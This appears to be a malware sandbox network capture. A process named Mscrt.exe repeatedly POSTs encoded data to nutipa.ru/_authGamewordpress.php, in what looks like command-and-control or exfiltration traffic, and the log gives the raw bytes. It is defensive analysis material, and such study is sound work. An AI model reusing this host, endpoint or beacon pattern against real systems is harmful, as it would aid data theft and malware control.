Dec 15, 2024 04:17:28.250456095 CET	796	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdINQ899okkaCsNq3hbRoaZ%2Bqs%2FuOSXzTtOKYb2vtghhW2YClfG7Av239os48tl7e8ok87kEoY5e%2BSf%2FeGvYLbEC2rkkzKBHNuxahl4OCHw8NUaxed4U5mAuk2g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2347e118f90caa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3804&min_rtt=1691&rtt_var=4861&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=78494&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:28.491372108 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:17:28.841716051 CET	2536	OUT	Data Raw: 50 5e 46 5f 5a 5d 5d 53 5d 5a 56 51 50 51 57 51 55 5d 5e 46 5a 55 5b 5a 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P^F_Z]]S]ZVQPQWQU]^FZU[ZYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$]+>2Y)\(6<<7Z#?0%)&=T= /Z'._?1T/.F'#P
Dec 15, 2024 04:17:29.577511072 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:29.830082893 CET	791	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=idQunmA8tdPWECtPpdJVww9Zhk9nWikvSzgxqhAoteIzzrj%2F49eEIEuJuFkVGCvYmyR0jbBxJ9aV76R8DYY31ui1jFD2REAufXXam3aOBzC2VI5fHRFvsf0tSrw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2347eaed1532fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3144&min_rtt=1816&rtt_var=3337&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=117335&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:30.068859100 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:30.423261881 CET	2536	OUT	Data Raw: 55 57 43 5a 5f 56 5d 51 5d 5a 56 51 50 5a 57 53 55 5c 5e 49 5a 54 5b 5d 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UWCZ_V]Q]ZVQPZWSU\^IZT[]YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$_)-.=)$5D<>/#&.]'>>(3#$>^<3,;.F'#P /
Dec 15, 2024 04:17:31.156102896 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:31.398201942 CET	789	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iSXro8oJFiXpZjcrEn4ooF2LRsrowagwUks3Ro3f8fDyHIA7SFulmI60AZ6YWNtTZRHLtt3AJN3V7cOIJt2PHKG4fKLCiN3y2hJ593IigFavmKzkRlMbnbQzsgA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2347f4cc1a8c45-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3069&min_rtt=1787&rtt_var=3236&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=121161&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49749	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:31.654244900 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:32.013773918 CET	2536	OUT	Data Raw: 50 52 43 59 5a 5a 58 56 5d 5a 56 51 50 5f 57 54 55 55 5e 43 5a 56 5b 52 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PRCYZZXV]ZVQP_WTUU^CZV[RYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'(=9?:#["<B(,#< &:2)T)#/Z3>*?28+.F'#P
Dec 15, 2024 04:17:32.740158081 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:32.981893063 CET	791	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cDdqushcI2owQ4Fs2l%2F9D4bTnD%2Bek1wOGUN7DazDqGM45OIJt68c0Z63rX0qjrNvK1PWQAANhba2zk1dUOhJbIVjVBxpjU4VAjGiVOKriXBB6oYX%2BlYtbEb%2FsB4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2347feaf2142e8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4483&min_rtt=2024&rtt_var=5677&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=67290&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a Data Ascii: 44W@T
Dec 15, 2024 04:17:33.173712969 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49750	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:33.415373087 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:33.763727903 CET	2536	OUT	Data Raw: 50 51 46 5f 5a 5d 5d 54 5d 5a 56 51 50 5d 57 52 55 53 5e 45 5a 54 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PQF_Z]]T]ZVQP]WRUS^EZT[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'(2[)8#,9+-#Z!/4X2.&^1==T>/['>6]+U&,.F'#P 3
Dec 15, 2024 04:17:34.500662088 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:34.741934061 CET	798	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBZ9TWnn3VTeCw%2Fw0bx%2BRtIvyddZnR7%2ByyQvGR3NZC40ucoKW%2B0w2XrXLY2lfXNfPDHmSKgwwmXrh56ZKjK0%2By9G5pHz8Df7YIcx0jSKr1YgsONbPcKrvIhHipQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234809ae6cc461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4774&min_rtt=1649&rtt_var=6869&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=54776&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49751	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:33.453178883 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1412 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:33.810775995 CET	1412	OUT	Data Raw: 50 51 46 5a 5a 5c 58 50 5d 5a 56 51 50 58 57 5a 55 55 5e 47 5a 54 5b 59 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PQFZZ\XP]ZVQPXWZUU^GZT[YYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$?9):5Z:A(.,!<721>9>00=6]+!R;.F'#P
Dec 15, 2024 04:17:34.535636902 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:34.782008886 CET	940	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fHinZibzhaZfg8SmtzoWEQrhXWyN7EHBuopue%2F2nhbiNlhqAjT75uVh9h9olTVyFtvaOOZrLyv%2F9WdJ3MGH%2FNDGLEARlBRU2oTYo27di%2F06dr7CUcs5jPwZN8VU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234809ee4d4388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4226&min_rtt=1570&rtt_var=5901&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1732&delivery_rate=63981&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 1e 22 3a 26 55 21 3d 2c 50 2e 3c 2a 09 28 09 24 08 24 0c 31 1d 27 28 2b 59 29 13 3c 0c 26 07 25 5e 34 31 3d 1d 3c 19 3e 03 31 0c 21 51 03 11 22 5b 26 10 01 05 29 07 2c 5b 32 31 37 14 25 5b 27 05 28 2b 39 0d 33 2b 3f 53 23 2e 2f 0a 39 29 38 1f 3c 2a 05 17 2d 00 08 1c 20 1c 2e 53 0c 17 25 5c 28 07 08 13 34 22 3e 0c 27 2c 19 55 21 2a 3e 55 3d 23 09 08 27 23 0a 0b 27 10 1a 14 22 09 3a 0b 25 29 2d 07 37 0c 26 50 2a 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a Data Ascii: 989":&U!=,P.<($$1'(+Y)<&%^41=<>1!Q"[&),[217%['(+93+?S#./9)8<- .S%\(4">',U!>U=#'#'":%)-7&P"%\ .R4]T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:34.993947983 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:17:35.341864109 CET	2536	OUT	Data Raw: 55 57 43 5a 5f 59 58 55 5d 5a 56 51 50 5c 57 5a 55 5c 5e 40 5a 54 5b 58 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UWCZ_YXU]ZVQP\WZU\^@ZT[XYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$(=>)#Z#/6A?+ ?#%^&=9T(3/3X5(),.F'#P 7
Dec 15, 2024 04:17:36.079461098 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:36.333264112 CET	792	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ybEyNU4a2AtWSL6IJa09FhKmJFOBXLDYwkYnuBzy7Udz52PgZ6rdNJST%2Bx52jj71h9hKspldj4cIolOk7Y0JR8NNJ2xb9oMkT%2Bs6TqG9K9RtQpA4ZKGKP4TCPl8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348138a491839-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4695&min_rtt=1652&rtt_var=6707&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=56149&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:36.575905085 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:36.920142889 CET	2536	OUT	Data Raw: 50 51 46 5c 5f 5f 58 57 5d 5a 56 51 50 5b 57 53 55 52 5e 40 5a 50 5b 59 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PQF\__XW]ZVQP[WSUR^@ZP[YYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$]([9**("<=+X4<(&%%.>($.(9S8+.F'#P +
Dec 15, 2024 04:17:37.661119938 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:37.924001932 CET	797	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCoSqSL%2BoFvEPKyzWC80C0xQeKl%2FAthBSoTnP34978kuMS%2FtEvvnKM1cd6aZvUq4Zfivw%2Bs%2BWNmdlnm5zAeaZCkypQa56WDcqUCjH4OkUHpKnxP1tusx09QB9Xs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23481d6edfc427-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4285&min_rtt=1678&rtt_var=5843&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=64788&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49756	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:38.165761948 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:17:38.513606071 CET	2536	OUT	Data Raw: 55 55 43 5d 5f 5c 58 51 5d 5a 56 51 50 5b 57 54 55 56 5e 43 5a 55 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UUC]_\XQ]ZVQP[WTUV^CZU[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$^([>= 56<7?4X&>1&:= 'X'-=<%V8;.F'#P +
Dec 15, 2024 04:17:39.263427019 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:39.503571033 CET	797	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9RXJnnmNMC5pWwbMpCwyk4Pg7GjaayiEUr%2B0jYI8dVl55pIygBGd7exzNN%2FRQ%2BMX3nLJDTlGsDGIdlcH3I6QzBbZN2W3NZpvYpm%2B1TUePjBscvu82Z8VZBcDArQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348276daa4378-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7914&min_rtt=2362&rtt_var=11990&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=31209&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:39.872019053 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:40.218610048 CET	1424	OUT	Data Raw: 50 5e 46 5f 5a 58 5d 56 5d 5a 56 51 50 5b 57 5a 55 5d 5e 46 5a 55 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P^F_ZX]V]ZVQP[WZU]^FZU[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$<._=:;5!?;\#?7%%%&>;^%.)(*;.F'#P +
Dec 15, 2024 04:17:41.002309084 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:41.251815081 CET	949	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JcW1Ne4zGY9TYXTxh8dvVnywft6asx%2BTA5v7Ndg9Mf%2BfdUUP32UOIB5nHij%2B52SkpH3zU8rU%2BqSXHVGFmlAYHjSSJYtzpvMhQ8SH6JwFyYhLpZE5%2B%2FVBGobiYRQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348324f0e1a34-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4748&min_rtt=1792&rtt_var=6585&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=57376&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 5c 22 03 31 0a 20 58 20 16 3a 05 2e 0b 2b 33 24 42 30 1c 3a 02 30 38 02 04 2a 03 2b 57 25 5f 21 12 22 21 3d 55 3f 24 21 10 32 0c 21 51 03 11 21 03 25 10 24 11 29 07 0d 04 26 31 0a 05 24 2e 3c 5f 28 3b 36 1e 33 28 02 0b 23 00 34 14 39 04 2b 02 28 14 2b 5b 2e 58 3a 1c 20 36 2e 53 0c 17 25 59 2b 3a 25 00 20 32 14 0d 33 02 15 11 20 07 2d 0e 29 0a 2b 08 27 0a 23 56 27 07 3b 09 36 33 29 52 32 3a 2e 59 34 0c 03 0e 29 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 989\"1 X :.+3$B0:08*+W%_!"!=U?$!2!Q!%$)&1$.<_(;63(#49+(+[.X: 6.S%Y+:% 23 -)+'#V';63)R2:.Y4)%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:40.014163017 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:40.377089024 CET	2536	OUT	Data Raw: 50 50 43 5b 5f 5b 5d 53 5d 5a 56 51 50 5b 57 57 55 57 5e 42 5a 5e 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PPC[_[]S]ZVQP[WWUW^BZ^[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+9=:$"Z=)=#Y4Z&=9%>*#?_$><#=T/;.F'#P +
Dec 15, 2024 04:17:41.149137020 CET	25	IN	HTTP/1.1 100 Continue
